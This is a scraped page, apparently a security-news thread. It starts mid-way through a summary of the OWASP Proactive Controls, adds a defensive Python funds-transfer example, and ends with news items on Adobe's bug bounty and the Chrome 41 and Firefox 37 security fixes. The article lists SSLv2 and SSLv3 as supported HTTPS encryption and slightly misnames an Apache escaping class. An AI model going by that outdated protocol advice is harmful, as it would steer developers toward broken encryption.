Sensitive information between the client and server should also be in encrypted form. Hyper Text Transfer Protocol Secure (HTTPS) should be used instead of Hyper Text Transfer Protocol (HTTP) whenever any sensitive information is to be transmitted. When HTTPS is used, client-server communication is encrypted using supported technology like SSLv2, SSLv3, TLS1.0, and TLS1.2. It is especially used to protect highly confidential data like online banking. The port number for HTTP is 80 and for HTTPS is 443.

Implement Logging and Intrusion Detection

In an application, most requests are received using the GET, POST, PUT, and DELETE methods. A request sent can be either a malicious request or a clean request. Malicious requests are those requests which contain attack vectors like SQL Injection, XSS, Unauthorized Data Access, etc. When there is public user activity or Intranet employee access, then the application should always keep track of all the activities taking place.

Logging is very important in every application and one of the areas which is most neglected during development and deployment. Logging means storing log data about every request that is sent and received, such as time, IP address, requested page, GET data, and POST data of a request. If a user is authenticated, then who the user is, when he logged in, when he logged out, etc. Since all user activity is being logged, it should also be noted that user sensitive data like passwords and financial details should NEVER be logged.

Intrusion Detection means detecting whether a malicious request with an attack vector has been received by the application or not. If such a request has been received, then suitable actions like logging and dropping the request should be performed.
For example, if a SQL Injection vulnerability exists on a login page, the application should have a feature to detect when SQL Injection is performed and should log the time and from which IP address the attack originated, and then perform a suitable action on it. ModSecurity and the OWASP ModSecurity Core Rule Set Project can prove to be of great use when you want to detect and/or prevent any malicious activity.

Logging and intrusion detection are necessary to keep a record of every activity that takes place on an application. Intrusion detection is implemented along with logging to keep a check on when an attack or malicious data is received, so that it can be handled properly.

Leverage Security Features of Frameworks and Security Libraries

When developers start developing any application, either they don't implement secure coding practices or they use third party libraries for implementing security features. But most programming languages or development frameworks have built-in security functions and libraries which can be leveraged to implement security features in applications. Developers should use those built-in features instead of third party libraries.

Recall OWASP Top 10 Vulnerabilities "A-9 Using Components with Known Vulnerabilities". If third party components or libraries are used and any vulnerability is discovered in those components, then our application will automatically become vulnerable.

It is recommended that developers should use security features provided by the programming language like escapeHtml() of httputils provided by Apache Commons Lang in Java and htmlentities() in PHP, which can be used to mitigate Cross-Site Scripting (XSS) vulnerabilities. But it is a known fact that industry-tested security features are not readily available in all programming languages.
In such a case, where useful and required security features or libraries are not available in the programming language you are using, industry trusted and tested security libraries should be used. One of the well-known OWASP projects for this purpose is the OWASP ESAPI Project, which helps developers to implement security controls in their applications.

For example, in Java we have security functions like escapeHtml() which can be used to mitigate XSS:

    // HTML-escape untrusted input before it is written back into a page
    String name = StringEscapeUtils.escapeHtml(request.getParameter("name"));

PreparedStatement is used to mitigate SQL Injection:

    // Parameters are bound separately from the query text, so input cannot change the SQL
    PreparedStatement ps = con.prepareStatement("select * from users where username=? and password=? limit 0,1");

Using built-in security features ensures that you don't have to use unnecessary libraries you are not confident in or have not security tested.

Include Security-Specific Requirements

When software or web application development is to be started, software requirements are laid out, which takes place in the early stage of an SDLC. As software requirements are mentioned initially in any project, security requirements should also be mentioned. Security requirements, if made part of an SDLC, can help in implementing security inside the application and also identifying the key areas which can be exploited.

According to OWASP Proactive Controls, three security requirements are important:

- Security features and functions;
- Business logic abuse cases;
- And data classification and privacy requirements.

Security features and functions

All security details, such as application features, modules, database details, module functioning and security implementation in modules should be mentioned in an application. It should be defined that all secure coding practices in any application should be implemented at the time of development.

Business logic abuse cases

When any application is designed, there is a way to access data and to perform operations.
For example, when a user is performing an online banking transaction, some details are required within a well-defined process:

1. Login to bank account.
2. Choose your account to transfer from.
3. Choose amount and destination account to transfer to.
4. Enter profile password.
5. Enter OTP password received on registered phone number.
6. Confirm transaction.
7. Wait for success message.

All these steps define a data flow diagram or business logic. Now these details can have some weaknesses, which can make them vulnerable. When the business logic has been listed, key areas of weakness can be identified, and areas where security can be beefed up can be identified too. For example:

- User should not be able to choose someone else's bank account as the source account of a transfer.
- User should not be able to bypass the profile password requirement.
- OTP should be valid only once and for that account only.

Data classification and privacy requirements

Data classification and requirements should be decided at the time of development. When any application interacts with the user, user data is received and stored. The answers to these questions should be decided in advance:

- Which data is to be accepted from the user?
- Is that data sensitive or not?
- Is that data to be stored?
- If data is sensitive, should the application decide whether it will be stored in encrypted or hashed format?

If bank details are stored, then those details should be verified and validated by the application. Data authorization should also be decided at an initial stage, like who can access, delete and modify data. Since the application will be dealing with users and operations on user data, it is critical to maintain logs for all activities. Logging of activity was discussed above in the "Implement Logging and Intrusion Detection" section.
Security Design and Architecture

In the first nine OWASP ProActive Controls, we saw how to implement security in our code, which areas to secure, how to secure them and what components can be used to help you implement better security in your application. In the last ProActive Control, we discuss the other areas of application security which can prove to be of great use and should not be neglected. OWASP has defined three key areas to take care of when developing any application:

- Know Your Tools
- Tiering, Trust and Dependencies
- Manage the Attack Surface

Know Your Tools

Every application is built using some server side language, client side language, database or no database, etc. Each component used could be the source of a security vulnerability in your application and server. For example, using an outdated version of the Struts Framework can lead to a user exploiting remote code execution on it, or an older version of PHP leading to the same consequence. Similar is the case for databases and every other component which is used to build an application. So before starting any application development, it should be made clear what components can or may lead to a vulnerable application in the present or near future.

Tiering, Trust and Dependencies

Each layer of the whole application is called a tier. With each tier there is an associated level of risk and vulnerabilities that can crop up. For every tier, be it client side, server side, database, or anything else, the risk associated with it should be calculated, and necessary mitigations should be implemented.

When an application is interacting with user input and user data, trust is the only factor which decides which operation should be performed, when to perform it, and on what to perform it. An authentication page not implemented properly will have a poor trust level and will allow malicious users to access others' data.
In the worst case, it will result in a user transferring funds or accessing confidential company data without proper authorization.

Application development involves using several components together and making sure that each component works with the others. This is the case of dependency, where component X depends upon component Y for its proper functioning. It is very common to use older components to maintain reliability and proper functioning. But each dependency should be thoroughly checked, or else it can create an unwanted weakness inside the application.

Manage the Attack Surface

The attack surface is the whole combined application including software, hardware, logic, client controls and server controls. Everything from physical to digital to logical makes up the attack surface. Any part of a setup, if and when found to be vulnerable, can act as an open entry gate for a malicious user to perform an action. Developers are usually not concerned about the web server software version the application will be deployed on. But older web server software like Apache or Struts can lead to an attacker successfully exploiting it and making his/her way into the application and user data.

Conclusion

From the OWASP ProActive Controls we learned how an application can be secured and how to identify the key areas of every application that all together help in strengthening our application and stored data. OWASP ProActive Controls are a good place to start training developers to implement secure coding practices and beef up the security of key areas of an application like authentication, authorization, and user data access and storage. But ProActive Controls should not be looked upon as the only set of controls for application security. They are a good place to start developing skills and knowledge, leading to continuous learning and habitual secure coding practices.

Reference
https://www.owasp.org/index.php/OWASP_Proactive_Controls

Source
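The banking business-logic checks described in the post above (the source account must belong to the caller, the profile password cannot be skipped, the OTP is single-use and bound to one account, and every decision is logged), as an added example that is not code from the original post or from OWASP. The users, accounts, balances and OTP store are constructed in memory for illustration; the static salt and the in-process OTP dictionary are simplifications, not a recommendation.

```python
"""Added example, not code from the original post or from OWASP: a minimal
funds-transfer handler that enforces the three business-logic checks listed
above (source account owned by the caller, profile password required, OTP
single-use and bound to that account) and logs every decision. Users,
accounts, balances and the OTP store are constructed in memory for
illustration; no real banking API is involved."""
import hashlib
import hmac
import secrets
import time

# --- constructed sample data -------------------------------------------------
_SALT = b"static-salt-for-demo"  # real code stores a random per-user salt


def _hash_pw(password: str) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), _SALT, 100_000)


USERS = {
    "alice": {"profile_pw": _hash_pw("alice-secret"), "accounts": {"ACC-1001", "ACC-1003"}},
    "bob":   {"profile_pw": _hash_pw("bob-secret"),   "accounts": {"ACC-2002"}},
}
BALANCES = {"ACC-1001": 500, "ACC-1003": 10, "ACC-2002": 100}
AUDIT_LOG = []  # (time, user, src, dst, amount, verdict, reason)

# OTP store: code -> {user, src, exp, used}; the binding is what makes the
# OTP valid "only once and for that account only".
_OTPS = {}


def issue_otp(user, src, ttl=120, now=None):
    """Issue a fresh 6-digit OTP bound to (user, source account) with a TTL."""
    now = time.time() if now is None else now
    code = f"{secrets.randbelow(10**6):06d}"
    _OTPS[code] = {"user": user, "src": src, "exp": now + ttl, "used": False}
    return code


def _consume_otp(code, user, src, now):
    rec = _OTPS.get(code)
    if rec is None or rec["used"] or now > rec["exp"]:
        return False
    if rec["user"] != user or rec["src"] != src:
        return False
    rec["used"] = True  # burn it so a replay of the same code fails
    return True


def transfer(user, src, dst, amount, profile_pw, otp, now=None):
    """Run the transfer flow; returns (ok, reason). Ownership is checked first,
    so a caller never learns anything about an account it does not own."""
    now = time.time() if now is None else now

    def deny(reason):
        AUDIT_LOG.append((now, user, src, dst, amount, "DENY", reason))
        return False, reason

    rec = USERS.get(user)
    if rec is None or src not in rec["accounts"]:
        return deny("source account not owned by user")
    if not hmac.compare_digest(_hash_pw(profile_pw), rec["profile_pw"]):
        return deny("bad profile password")
    if not _consume_otp(otp, user, src, now):
        return deny("OTP invalid, expired, already used, or for another account")
    if amount <= 0 or dst not in BALANCES or dst == src or BALANCES[src] < amount:
        return deny("invalid amount or destination")
    BALANCES[src] -= amount
    BALANCES[dst] += amount
    AUDIT_LOG.append((now, user, src, dst, amount, "OK", ""))
    return True, "ok"


if __name__ == "__main__":
    code = issue_otp("alice", "ACC-1001")
    print(transfer("alice", "ACC-1001", "ACC-2002", 50, "alice-secret", code))
    print(transfer("alice", "ACC-1001", "ACC-2002", 50, "alice-secret", code))  # replay
```

The order of the checks is deliberate: ownership is verified before the password and OTP are even looked at, so a wrong password never burns a valid OTP and a caller probing someone else's account number gets the same denial whatever else it sends. The audit log records denials as well as successes, which is what makes the later "Implement Logging and Intrusion Detection" control useful in practice.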
  24. Adobe has launched a bug bounty program that hands out high-fives, not cash. The web application vulnerability disclosure program, announced today and launched last month, operates through HackerOne, used by the likes of Twitter, Yahoo!, and CloudFlare, some of which provide cash or other rewards to those who disclose security messes. Adobe's program seeks out common flaws in its online services, including:

- cross-site scripting;
- privileged cross-site request forgery;
- server-side code execution;
- authentication or authorisation flaws;
- injection vulnerabilities;
- directory traversal;
- information disclosure, and
- significant security misconfiguration.

"In recognition of the important role that independent security researchers play in keeping Adobe customers safe, today Adobe launches a web application vulnerability disclosure program on the HackerOne platform," wrote Adobe security program manager Pieters Ockers. "Bug hunters who identify a web application vulnerability in an Adobe online service or web property can now privately disclose the issue to Adobe while boosting their HackerOne reputation score." Hackers will need to be the first in for reporting a flaw and offer Adobe "reasonable" time to fix the flaws prior to public disclosure, Ockers says. Smaller vulnerabilities such as the following are excluded:

- Logout and other instances of low-severity cross-site request forgery
- Perceived issues with password reset links
- Missing HTTP security headers
- Missing cookie flags on non-sensitive cookies
- Clickjacking on static pages

The announcement comes as AirBnB this week launched its bug bounty on the popular HackerOne platform. Bug bounties work best when they offer cash, according to BugCrowd engineer Drew Sing. In vulnerability program guidelines published in July he says money is the best incentive to encourage researchers to conduct more regular and intense testing of products and services.
"A high priority security issue handled improperly could damage the reputation of the organisation ... the development, IT and communications team are all critical components to a successful program," Sing says. The managed bug service recommends bounties should be published in an obvious location on websites, preferably located with the /security subdomain, and sport a dedicated security contact who is well-briefed in handling disclosures. So why has Adobe decided street cred, not cash, is the way to go? Wags might wonder if the company's infamously-porous products have so many bugs that a cash bounty could dent the bottom line. Source
  25. Google and Firefox have upgraded their flagship browsers, crushing bugs and cracking down on bad certificates along the way. The Choc Factory's Chrome 41 swats 51 bugs, of which at least 13 are classified as high severity and six are considered medium risks. Google engineer Penny MacNeil thanked security researchers for the effort to identify the bugs. "We would also like to thank all security researchers that worked with us during the development cycle to prevent security bugs from ever reaching the stable channel," MacNeil says. Here's this month's ameliorated messes:

[$7500][456516] High CVE-2015-1212: Out-of-bounds write in media. Credit to anonymous.
[$5000][448423] High CVE-2015-1213: Out-of-bounds write in skia filters. Credit to cloudfuzzer.
[$5000][445810] High CVE-2015-1214: Out-of-bounds write in skia filters. Credit to cloudfuzzer.
[$5000][445809] High CVE-2015-1215: Out-of-bounds write in skia filters. Credit to cloudfuzzer.
[$4000][454954] High CVE-2015-1216: Use-after-free in v8 bindings. Credit to anonymous.
[$3000][456192] High CVE-2015-1217: Type confusion in v8 bindings. Credit to anonymous.
[$3000][456059] High CVE-2015-1218: Use-after-free in dom. Credit to cloudfuzzer.
[$3000][446164] High CVE-2015-1219: Integer overflow in webgl. Credit to Chen Zhang (demi6od) of NSFOCUS Security Team.
[$3000][437651] High CVE-2015-1220: Use-after-free in gif decoder. Credit to Aki Helin of OUSPG.
[$2500][455368] High CVE-2015-1221: Use-after-free in web databases. Credit to Collin Payne.
[$2500][448082] High CVE-2015-1222: Use-after-free in service workers. Credit to Collin Payne.
[$2000][454231] High CVE-2015-1223: Use-after-free in dom. Credit to Maksymillian Motyl.
[449610] High CVE-2015-1230: Type confusion in v8. Credit to Skylined working with HP's Zero Day Initiative.
[$2000][449958] Medium CVE-2015-1224: Out-of-bounds read in vpxdecoder. Credit to Aki Helin of OUSPG.
[$1000][446033] Medium CVE-2015-1225: Out-of-bounds read in pdfium. Credit to cloudfuzzer.
[$1000][456841] Medium CVE-2015-1226: Validation issue in debugger. Credit to Rob Wu.
[$1000][450389] Medium CVE-2015-1227: Uninitialized value in blink. Credit to Christoph Diehl.
[$1000][444707] Medium CVE-2015-1228: Uninitialized value in rendering. Credit to miaubiz.
[$500][431504] Medium CVE-2015-1229: Cookie injection via proxies. Credit to iliwoy.

Mozilla's update to Firefox version 37 includes a revocation feature to bolster the killing of bad intermediate certificates. OneCRL replaces the Online Certificate Status Protocol, which is less effective because it relies on third parties to keep updated registries of their valid and revoked certificates. Certificates were often accepted as soft-fails when the status could not be determined due to some technical or connectivity failure. Mozilla's new list operates in the browser and is populated by issuers who push certificate status instead of the browser having to do the fetching. This block-list, already used for blacklisting bad plugins and drivers, will now speed up checking times because it avoids the need for Mozilla to push out updates that require browser restarts, Mozilla security boffin Mark Goodwin says. "OneCRL helps speed up revocation checking by maintaining a centralised list of revoked certificates and pushing it out to browsers. Currently, if a serious incident occurs that requires certificates to be revoked, we release an update to Firefox to address the problem. This is slow because it takes some time for users to get the security update and restart their browsers. There's also cost involved in producing an update and in users downloading it." Goodwin points to a blog by Google's Adam Langley, who said last year that the old revocation checking did little to improve security. OneCRL for now covers intermediate certificates to reduce the size of Mozilla's blocklist and will later be sped up by automating the collection of revoked certificates. Source